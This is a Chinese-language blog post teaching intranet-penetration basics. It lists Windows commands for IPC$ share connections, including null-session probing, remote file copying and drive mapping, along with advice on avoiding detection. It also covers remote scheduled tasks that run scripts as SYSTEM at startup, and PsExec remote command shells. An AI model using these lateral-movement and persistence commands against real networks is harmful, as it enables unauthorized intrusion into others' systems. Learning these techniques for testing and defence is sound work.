<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">

<script>
    (function(){
        if(''){
            if (prompt('请输入文章密码') !== ''){
                alert('密码错误！');
                history.back();
            }
        }
    })();
</script>








<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="https://fonts.cat.net/css?family=PT Mono:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">










<meta name="description" content="内网渗透基础之共享连接及定时任务，稍微总结了下，写的东西都比较浅。">
<meta property="og:type" content="article">
<meta property="og:title" content="任务执行和建立共享">
<meta property="og:url" content="http://yoursite.com/2020/01/18/任务执行和建立共享/index.html">
<meta property="og:site_name" content="Bu1&#39;Blog">
<meta property="og:description" content="内网渗透基础之共享连接及定时任务，稍微总结了下，写的东西都比较浅。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2020-01-18T11:49:21.837Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="任务执行和建立共享">
<meta name="twitter:description" content="内网渗透基础之共享连接及定时任务，稍微总结了下，写的东西都比较浅。">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2020/01/18/任务执行和建立共享/">





  <title>任务执行和建立共享 | Bu1'Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Bu1'Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">如果能控制粗鄙的狂喜，就不会有深入骨髓的悲伤。</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/01/18/任务执行和建立共享/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Bu1">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Bu1'Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">任务执行和建立共享</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-01-18T16:06:54+08:00">
                2020-01-18
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/内网渗透/" itemprop="url" rel="index">
                    <span itemprop="name">内网渗透</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2020/01/18/任务执行和建立共享/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count disqus-comment-count" data-disqus-identifier="2020/01/18/任务执行和建立共享/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  914 字
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  3 分钟
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>内网渗透基础之共享连接及定时任务，稍微总结了下，写的东西都比较浅。</p>
<a id="more"></a>

<h1 id="共享连接"><a href="#共享连接" class="headerlink" title="共享连接"></a>共享连接</h1><h2 id="ipc"><a href="#ipc" class="headerlink" title="ipc$"></a>ipc$</h2><p>IPC$(Internet Process Connection)是共享 “命名管道 “的资源(大家都是这么说的)，它是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。</p>
<p><strong>如果远程服务器未开启139、445端口，无法使用IPC$进行连接；在同一时间内，两个ip之间只允许建立一个连接。</strong></p>
<blockquote>
<p>在初次安装系统时还打开了默认共享，即所有的逻辑共享(c$,d$,e$……)和系统目录winnt或管理员目录(admin$)共享。</p>
</blockquote>
<h2 id="建立ipc-连接"><a href="#建立ipc-连接" class="headerlink" title="建立ipc$连接"></a>建立ipc$连接</h2><ul>
<li>net use \\192.168.3.122\ipc$ /u:”” “” 先空连接探测</li>
<li>net use  查看当前机器中的ipc连接有哪些</li>
<li>net use \\192.168.3.122\ipc$ “password” /user:admin  有密码的连接</li>
<li>net use \\192.168.3.122\ipc$ /del       #删除指定ipc连接</li>
<li>net use * /del    #删除所有连接</li>
<li>net share  查看共享</li>
<li>删除共享(重启后默认共享仍然存在)<ul>
<li>net share ipc$ /delete</li>
<li>net share admin$ /delete</li>
<li>net share c$ /delete</li>
<li>net share d$ /delete </li>
<li>… e,f盘类似</li>
</ul>
</li>
</ul>
<h2 id="检验ipc-连接"><a href="#检验ipc-连接" class="headerlink" title="检验ipc$连接"></a>检验ipc$连接</h2><ul>
<li>dir \\192.169.226.139\c$  查看远程连接对象的目录</li>
</ul>
<h2 id="传输文件"><a href="#传输文件" class="headerlink" title="传输文件"></a>传输文件</h2><ul>
<li>copy calc.bat \\192.169.226.139\c$  传输文件</li>
</ul>
<h2 id="硬盘映射"><a href="#硬盘映射" class="headerlink" title="硬盘映射"></a>硬盘映射</h2><ul>
<li>net use p:  \\192.168.226.139\c$  映射远控机器的C盘到本地</li>
<li>net use p:  /del     删除映射(实际的渗透过程中应该尽可能缩短映射时间防止被发现)</li>
</ul>
<h1 id="定时任务"><a href="#定时任务" class="headerlink" title="定时任务"></a>定时任务</h1><h2 id="At命令"><a href="#At命令" class="headerlink" title="At命令"></a>At命令</h2><ul>
<li><p>建立任务</p>
<p>win7以前一般是使用“AT”命令进行定时操作。一般在ipc$连接后可以开始定时任务。命令格式： at \\计算机名字或者ip 执行时间 程序目录</p>
<p><code>假如执行C盘下的脚本:at \\192.168.226.139 11:30 c:\\calc.bat</code></p>
</li>
<li><p>清除任务</p>
<p><code>at \\192.168.226.139 id /delete</code></p>
<p><strong>id为空则会删除所有的作业</strong> </p>
</li>
<li><p>执行任务</p>
<p><code>at \\192.168.226.139 11:30 cmd.exe /c &quot;ipconfig &gt; c:\1.txt&quot;</code></p>
<p><strong>由于没有回显结果，所以可以存储在文本文件中查看命令执行后的回显</strong></p>
</li>
</ul>
<h2 id="schtasks"><a href="#schtasks" class="headerlink" title="schtasks"></a>schtasks</h2><p>win7以后可使用schtasks，这个命令的好处在于可以更加灵活的控制脚本的启动时间。</p>
<ul>
<li><p>创建任务</p>
<p><code>schtasks /create /s 192.168.226.139 /tn name /sc onstart /tr c:\calc.bat /ru system /f</code></p>
<blockquote>
<p> onstart代表任务在每次系统启动的时候运行 ，name是为任务取得名字</p>
</blockquote>
</li>
<li><p>激活任务</p>
<p><code>schtasks /run /s 192.168.226.139 /i /tn &quot;name&quot;</code></p>
</li>
<li><p>删除任务</p>
<p><code>schtasks /delete /s 192.168.226.139 /tn &quot;name&quot; /f</code></p>
</li>
</ul>
<p><strong>注意：这个命令在使用时会产生大量的日志</strong></p>
<h2 id="Psexec"><a href="#Psexec" class="headerlink" title="Psexec"></a>Psexec</h2><p>第一次使用会弹窗，输入–accepteula这个参数就可以绕过。</p>
<ul>
<li><p>执行任务</p>
<p><code>psexec.exe \\ip –accepteula -u username -p password program.exe</code></p>
</li>
<li><p>假如已经建立ipc连接</p>
<p><code>psexec.exe \\ip –accepteula cmd.exe</code></p>
</li>
<li><p>骚操作(-s 管理员 -i 靶机是否能看到 –d命令执行后返回)</p>
<ul>
<li>psexec \\ip -u admini -p pwd -d -s calc   管理员权限且靶机不显示</li>
<li>psexec \\ip -u admini -p pwd -i -d cmd /c start http:// <a href="http://www.baidu.com" target="_blank" rel="noopener">www.baidu.com</a>  靶机打开浏览器且靶机弹窗</li>
<li>psexec \\ip -u admin -p pwd -s cmd 此条命令会反弹靶机的cmd到本机</li>
</ul>
</li>
</ul>
<blockquote>
<p>cmd建立非空文件命令</p>
<ul>
<li>copy con 1.txt 创建文件并开始输入内容 ctrl+z 后加回车键结束输入</li>
<li>echo 内容 &gt; 1.txt 将内容输出到1.txt</li>
<li>echo 内容 &gt;&gt; 1.txt 将内容追加到1.txt</li>
<li>type 1.txt 查看文件内容</li>
</ul>
</blockquote>

      
    </div>
    
    
    

    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者：</strong>
    Bu1
  </li>
<li class="post-copyright-link">
  <strong>本文链接：</strong>
  <a href="http://bu1.github.io/2020/01/18/任务执行和建立共享/" title="任务执行和建立共享">http://bu1.github.io/2020/01/18/任务执行和建立共享/</a>
</li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>
    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
  </li>
</ul>

      </div>
    
	<div>
      
        <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------END<i class="fa fa-paw"></i>-------------</div>
    
</div>
      
    </div>
    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/01/17/内网渗透基础之信息收集/" rel="next" title="内网渗透基础之信息收集">
                <i class="fa fa-chevron-left"></i> 内网渗透基础之信息收集
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/01/19/代理与端口转发/" rel="prev" title="代理与端口转发">
                代理与端口转发 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>

  
  
  
  
  



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/avatar.png" alt="Bu1">
            
              <p class="site-author-name" itemprop="name">Bu1</p>
              <p class="site-description motion-element" itemprop="description">最为惊艳的是思想碰撞产生的火花。</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">24</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            

          </nav>

          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://tanpuhan.github.io" title="CoCo1er" target="_blank">CoCo1er</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.y1nhui.com" title="y1nhui" target="_blank">y1nhui</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#共享连接"><span class="nav-number">1.</span> <span class="nav-text">共享连接</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#ipc"><span class="nav-number">1.1.</span> <span class="nav-text">ipc$</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#建立ipc-连接"><span class="nav-number">1.2.</span> <span class="nav-text">建立ipc$连接</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#检验ipc-连接"><span class="nav-number">1.3.</span> <span class="nav-text">检验ipc$连接</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#传输文件"><span class="nav-number">1.4.</span> <span class="nav-text">传输文件</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#硬盘映射"><span class="nav-number">1.5.</span> <span class="nav-text">硬盘映射</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#定时任务"><span class="nav-number">2.</span> <span class="nav-text">定时任务</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#At命令"><span class="nav-number">2.1.</span> <span class="nav-text">At命令</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#schtasks"><span class="nav-number">2.2.</span> <span class="nav-text">schtasks</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Psexec"><span class="nav-number">2.3.</span> <span class="nav-text">Psexec</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2018 &mdash; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Bu1</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">51.2k</span>
  
</div>


  <!--<div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>"



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>-->




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  

    
      <script id="dsq-count-scr" src="https://.disqus.com/count.js" async></script>
    

    
      <script type="text/javascript">
        var disqus_config = function () {
          this.page.url = 'http://yoursite.com/2020/01/18/任务执行和建立共享/';
          this.page.identifier = '2020/01/18/任务执行和建立共享/';
          this.page.title = '任务执行和建立共享';
        };
        var d = document, s = d.createElement('script');
        s.src = 'https://.disqus.com/embed.js';
        s.setAttribute('data-timestamp', '' + +new Date());
        (d.head || d.body).appendChild(s);
      </script>
    

  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
